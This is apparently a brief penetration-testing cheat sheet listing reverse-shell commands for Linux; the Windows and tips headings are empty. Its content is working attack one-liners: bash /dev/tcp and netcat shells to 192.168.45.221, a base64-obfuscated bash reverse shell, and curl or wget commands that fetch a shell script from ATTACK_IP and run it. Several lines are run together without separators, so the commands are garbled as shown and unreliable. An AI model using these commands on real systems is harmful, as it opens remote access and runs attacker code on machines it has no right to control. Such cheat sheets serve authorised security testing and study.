Reverse Shell Execution Methodology
1) Resources to generate reverse shells:
2) Most chosen reverse shells to execute
Linux
/bin/bash -i >& /dev/tcp/192.168.45.221/80 0>&1rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.45.221 80 >/tmp/fbase64 revshell.sh
echo "BASE64_SHELL" |base64 -d | bash
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjIzNy84MCAwPiYx}|{base64,-d}|{bash,-i}curl http://ATTACK_IP/shell.sh | bashwget http://ATTACK_IP/shell.sh -o /tmp/shell.sh && chmod +x /tmp/shell.sh && /tmp/shell.shWindows
3) Tips and tricks
Last updated